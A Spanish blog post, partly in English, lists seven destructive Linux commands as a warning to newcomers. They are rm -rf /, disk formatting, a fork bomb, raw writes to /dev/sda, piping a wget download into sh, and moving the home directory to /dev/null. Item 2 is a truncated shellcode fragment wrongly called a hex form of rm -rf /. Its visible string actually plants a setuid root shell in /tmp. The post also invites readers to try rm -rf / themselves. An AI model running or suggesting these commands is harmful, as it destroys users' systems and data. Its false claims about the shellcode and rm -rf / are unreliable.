COMO matar tu LINUX

Como ya sabran el famoso comando rm -rf / ya dejo de ser una broma para los geeks que siempre recomendaban a los newbies como metodo para solucionar algun problema…

Ya no se puede efectuar destruir el sistema con este comando… lo dudan??? Pruebenlo y me comentan.

Pero aparte de este bendito comando quedan otros 6 mas… Aqui el artículo en un ingles basico:

If you are new to Linux, chances are you will meet a stupid person perhaps in a forum or chat room that can trick you into using commands that will harm your files or even your entire operating system. To avoid this dangerous scenario from happening, I have here a list of deadly Linux commands that you should avoid.

1. Code:
rm -rf /
This command will recursively and forcefully delete all the files inside the root directory.

2. Code:

char esp[] __attribute__ ((section(".text"))) /* e.s.p

release */
= "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"
"cp -p /bin/sh /tmp/.beyond; chmod 4755 /tmp/.beyond;";

This is the hex version of [rm -rf /] that can deceive even the rather experienced Linux users.

3. Code:
mkfs.ext3 /dev/sda
This will reformat or wipeout all the files of the device that is mentioned after the mkfs command.

4. Code:
: ( ) { : | : & } ; :
Known as forkbomb, this command will tell your system to execute a huge number of processes until the system freezes. This can often lead to corruption of data.

5. Code:
any_command > /dev/sda
With this command, raw data will be written to a block device that can usually clobber the filesystem resulting in total loss of data.

6. Code:
wget http://some_untrusted_source -O- | sh
Never download from untrusted sources, and then execute the possibly malicious codes that they are giving you.

7. Code:
mv /home/yourhomedirectory/* /dev/null


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